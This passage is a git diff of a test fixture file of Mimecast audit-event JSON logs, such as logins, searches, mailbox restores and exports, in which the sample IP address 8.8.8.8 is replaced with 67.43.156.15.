b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log index d5e73cc12ee..8f129afe2f2 100644 --- a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log +++ b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log @@ -1,25 +1,25 @@ -{"auditType":"Threat Intel Feed Download","category":"reporting_logs","eventInfo":"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 8.8.8.8, Application: Integrations","eventTime":"2021-10-18T08:45:02+0000","id":"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48","user":"johndoe@example.com"} -{"id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70","auditType": "Threat Intel Feed Download","user": "johndoe@example","eventTime": "2021-10-10T22:51:57+0000","eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 8.8.8.8, Application: Azure Sentinel","category": "reporting_logs"} -{"id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A","auditType": "User Logged On","user": "johndoe@example.com","eventTime": "2021-10-11T17:17:30+0000","eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:30 BST, IP: 8.8.8.8, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP","category": "authentication_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60","auditType":"Logon Requires Challenge","user":"johndoe@example.com","eventTime":"2021-10-11T17:17:26+0000","eventInfo":"Intermediate authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:26 BST, IP: 8.8.8.8, Application: Administration Console, Method: Office 365, 2FA: TOTP","category":"authentication_logs"} -{ "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "auditType": "User Logged On", "user": "johndoe@example.com", "eventTime": "2021-10-11T16:03:38+0000", "eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 17:03:38 BST, IP: 8.8.8.8, Application: Administration Console, Method: Cloud", "category": "authentication_logs"} -{ "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "auditType": "Mimecast Support Login", "user": "johdoe@example.local", "eventTime": "2021-10-11T15:39:17+0000", "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-11 Time: 16:39:17 +0100 IP: 8.8.8.8 Application: Administration Console", "category": "mimecast_access_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK","auditType":"Mimecast Support Login","user":"johndoe@example.local","eventTime":"2021-10-19T11:46:40+0000","eventInfo":"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-19 Time: 12:46:40 +0100 IP: 8.8.8.8 Application: Administration Console","category":"mimecast_access_logs"} -{"id":"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8","auditType":"Message Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:36:01+0000","eventInfo":"Viewed Message - Source: Search, From: johndoe@example.com, To: johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw","auditType":"Search Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:35:53+0000","eventInfo":"Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-11T14:46:10+0000","eventInfo":"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 8.8.8.8 application : LFS","category":"authentication_logs"} +{"auditType":"Threat Intel Feed Download","category":"reporting_logs","eventInfo":"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations","eventTime":"2021-10-18T08:45:02+0000","id":"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48","user":"johndoe@example.com"} +{"id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70","auditType": "Threat Intel Feed Download","user": "johndoe@example","eventTime": "2021-10-10T22:51:57+0000","eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel","category": "reporting_logs"} +{"id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A","auditType": "User Logged On","user": "johndoe@example.com","eventTime": "2021-10-11T17:17:30+0000","eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP","category": "authentication_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60","auditType":"Logon Requires Challenge","user":"johndoe@example.com","eventTime":"2021-10-11T17:17:26+0000","eventInfo":"Intermediate authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP","category":"authentication_logs"} +{ "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "auditType": "User Logged On", "user": "johndoe@example.com", "eventTime": "2021-10-11T16:03:38+0000", "eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud", "category": "authentication_logs"} +{ "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "auditType": "Mimecast Support Login", "user": "johdoe@example.local", "eventTime": "2021-10-11T15:39:17+0000", "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console", "category": "mimecast_access_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK","auditType":"Mimecast Support Login","user":"johndoe@example.local","eventTime":"2021-10-19T11:46:40+0000","eventInfo":"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console","category":"mimecast_access_logs"} +{"id":"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8","auditType":"Message Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:36:01+0000","eventInfo":"Viewed Message - Source: Search, From: johndoe@example.com, To: johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw","auditType":"Search Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:35:53+0000","eventInfo":"Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-11T14:46:10+0000","eventInfo":"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS","category":"authentication_logs"} {"id":"eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys","auditType":"Completed Directory Sync","user":"","eventTime":"2021-10-11T13:21:06+0000","eventInfo":"No changes found.","category":"account_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo","auditType":"Case Action","user":"johndoe@example.com","eventTime":"2021-10-12T09:19:53+0000","eventInfo":"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:55+0000","eventInfo":"Failed authentication for johndoe@example.com , Date: 2021-10-12, Time: 09:47:55 BST, IP: 8.8.8.8, Application: mimecast-moa, Method: Office 365, Reason: Wrong password","category":"authentication_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w","auditType":"Existing Archive Task Changed","user":"johdoe@example.com","eventTime":"2021-10-12T08:47:54+0000","eventInfo":"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM","auditType":"Connectors Management","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:53+0000","eventInfo":"Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 8.8.8.8, Application: Administration Console","category":"integrations_and_apis"} -{"id":"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U","auditType":"Page Data Exports","user":"johndoe@example.com","eventTime":"2021-10-12T02:27:18+0000","eventInfo":"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :8.8.8.8,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 8.8.8.8, Application: mimecast-matfe","category":"account_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF","auditType":"Custom Report Definition Created","user":"johndoe@example.local","eventTime":"2021-10-11T19:53:41+0000","eventInfo":"Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local Date: 2021-10-11 Time: 20:53:41 +0100 IP: 8.8.8.8 Application: Administration Console","category":"reporting_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh","auditType":"Folder Log Entry","user":"johndoe@example.com","eventTime":"2021-10-11T18:23:10+0000","eventInfo":"Action Performed - Deleted New Folder by johndoe@example.com Date: 2021-10-11 Time: 19:23:10 +0100 IP: 8.8.8.8 Application: Administration Console","category":"profile_group_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo","auditType":"Case Action","user":"johndoe@example.com","eventTime":"2021-10-12T09:19:53+0000","eventInfo":"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:55+0000","eventInfo":"Failed authentication for johndoe@example.com , Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password","category":"authentication_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w","auditType":"Existing Archive Task Changed","user":"johdoe@example.com","eventTime":"2021-10-12T08:47:54+0000","eventInfo":"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM","auditType":"Connectors Management","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:53+0000","eventInfo":"Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console","category":"integrations_and_apis"} +{"id":"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U","auditType":"Page Data Exports","user":"johndoe@example.com","eventTime":"2021-10-12T02:27:18+0000","eventInfo":"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe","category":"account_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF","auditType":"Custom Report Definition Created","user":"johndoe@example.local","eventTime":"2021-10-11T19:53:41+0000","eventInfo":"Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console","category":"reporting_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh","auditType":"Folder Log Entry","user":"johndoe@example.com","eventTime":"2021-10-11T18:23:10+0000","eventInfo":"Action Performed - Deleted New Folder by johndoe@example.com Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration Console","category":"profile_group_logs"} {"id":"eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR","auditType":"User Password Changed","user":"johndoe@example.com","eventTime":"2021-10-12T19:56:55+0000","eventInfo":"Password reset for user: johndoe@example.com User Password Changed, Remote IP is null","category":"user_account_and_role_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T19:49:30+0000","eventInfo":"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 8.8.8.8, Application: Administration Console","category":"account_logs"} -{"id":"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw","auditType":"Archive Mailbox Restore","user":"johndoe@example.com","eventTime":"2021-10-12T19:20:01+0000","eventInfo":"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84","auditType":"Archive Mailbox Restore","user":"johndoejr@example.com","eventTime":"2021-10-12T18:19:33+0000","eventInfo":"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0","auditType":"Archive Mailbox Export Download","user":"johndoe@example.com","eventTime":"2021-10-12T17:55:14+0000","eventInfo":"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul","auditType":"Review Set Action","user":"johndoe@example.com","eventTime":"2021-10-12T17:07:00+0000","eventInfo":"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38","auditType":"Remediation Incident 